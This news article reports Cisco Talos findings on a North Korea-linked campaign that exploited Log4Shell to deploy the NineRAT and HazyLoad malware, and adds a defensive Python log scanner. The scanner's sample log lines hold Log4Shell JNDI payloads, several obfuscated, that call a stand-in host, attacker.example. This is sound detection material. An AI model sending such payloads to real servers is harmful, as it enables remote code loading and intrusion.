Lazarus Group targets organisations worldwide exploiting Log4j vulnerability

The hackers launched a series of cyberattacks against companies in the manufacturing, agriculture and physical security sectors.


The Log4j vulnerability has been exploited by hackers linked to Lazarus Group in a series of cyberattacks against companies in the manufacturing, agriculture and physical security sectors.

The attacks were part of ‘Operation Blacksmith’, which involved using at least three new malware families, as researchers at Cisco Talos reported. One of these malware families was ‘NineRAT,’ a remote access trojan (RAT) that allows an attacker to control an infected computer remotely.

‘“Operation Blacksmith” leveraged CVE-2021-44228, also known as Log4Shell, to compromise vulnerable systems exposed to the internet, and deployed a novel DLang-based RAT that used Telegram as its [command-and-control] channel,’ the researchers said.

The hackers used Telegram as the command-and-control channel for NineRAT, which helps the traffic blend in with legitimate use of the messaging service and so evade detection; the malware has three components and establishes persistence on the infected device. Log4Shell gave the hackers their way into public-facing VMware Horizon servers; on compromised hosts they deployed the HazyLoad backdoor and carried out reconnaissance and further attacks. Log4Shell remains a serious threat two years after its discovery, as many applications still ship or bundle vulnerable versions of Log4j.
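Because the initial access in this campaign was a two-year-old bug, the most useful check for a defender is still the simple one: look for Log4Shell lookups in the request fields your Java applications log. The following is an added example written for this article, not code from Cisco Talos or from the campaign. It scans constructed access-log lines (the hostnames, IPs and paths are made up) for the `${jndi:...}` lookup that CVE-2021-44228 evaluates, after undoing the obfuscations attackers commonly layer on top: URL encoding, `${lower:x}`/`${upper:x}`, and the default-value form `${prefix:key:-x}`, which a vulnerable Log4j resolves to `x` whenever the key is unknown.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example; they are not from the
# article or from the Talos report. Line 0 is benign; the rest carry a Log4Shell
# lookup in the User-Agent or query string, in progressively more obfuscated forms.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2023:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2023:10:01:04 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}di:rmi://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2023:10:01:05 +0000] "GET /x-api/ HTTP/1.1" 200 1024 "-" "${${::-j}ndi:${::-l}dap://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2023:10:01:06 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${${env:NOTEXIST:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.10 - - [10/Dec/2023:10:01:07 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fe%7D HTTP/1.1" 200 1024 "-" "curl/8.0"',
]

# An innermost ${...} lookup: a body with no further '$', '{' or '}' inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A resolved lookup naming a JNDI URL. The scheme list covers providers seen in
# public Log4Shell payloads; it is not exhaustive.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}",
    re.IGNORECASE,
)


def _resolve_lookup(body: str):
    """Evaluate one innermost lookup the way a vulnerable Log4j 2.x would.

    Only the three tricks attackers lean on for obfuscation are modelled:
    ${lower:x}, ${upper:x}, and the default-value form ${prefix:key:-x},
    which yields x when the key is unknown (e.g. ${::-x}, ${env:NOPE:-x}).
    Anything else returns None and is left in place.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode, then collapse nested lookups inside-out until nothing changes."""
    text = unquote(text)

    def _replace(m):
        resolved = _resolve_lookup(m.group(1))
        return m.group(0) if resolved is None else resolved

    for _ in range(max_rounds):  # bounded so a pathological input cannot spin forever
        new = _INNERMOST.sub(_replace, text)
        if new == text:
            break
        text = new
    return text


def find_jndi(text: str):
    """Return the first de-obfuscated ${jndi:...} lookup in text, or None."""
    m = _JNDI.search(normalize(text))
    return m.group(0) if m else None


def scan_log(lines):
    """Return [(line_index, decoded_payload)] for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        payload = find_jndi(line)
        if payload is not None:
            hits.append((i, payload))
    return hits


if __name__ == "__main__":
    for i, payload in scan_log(SAMPLE_LOGS):
        print(f"line {i}: {payload}")
```

Treat a hit as a signal to triage, not proof of compromise: the lookup only fires if the logging application is on an unpatched Log4j, and a server that logs the request but was already patched will still show the string. Conversely, the normaliser models only the common obfuscations, so a clean scan does not clear a host; run it across every logged request field (headers as well as the URL), and prioritise upgrading Log4j over signature-based detection.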

Researchers discovered that NineRAT was created in May 2022 and first deployed in March 2023 against a South American agricultural organisation. It was then used again in September 2023 against a European manufacturer.

Cisco Talos linked Operation Blacksmith to Andariel, a hacking group associated with North Korea, because of the use of a sophisticated tool called ‘HazyLoad.’ HazyLoad was detected in May 2023 in the breaches of a European company and of the American subsidiary of a South Korean physical security and surveillance company.

Andariel usually focuses on gaining initial access, conducting reconnaissance and maintaining long-term access for espionage purposes in support of the North Korean government’s national interests. The researchers also mentioned that Andariel had previously launched ransomware attacks against healthcare organisations.

Andariel is believed to be a sub-group of Lazarus Group. Cisco Talos confirmed that Lazarus Group is a collective name for several sub-groups operating from North Korea, as previously reported by cybersecurity agencies and experts. The sub-groups run ‘their own campaigns and use custom-made malware against their targets, without necessarily coordinating with each other.’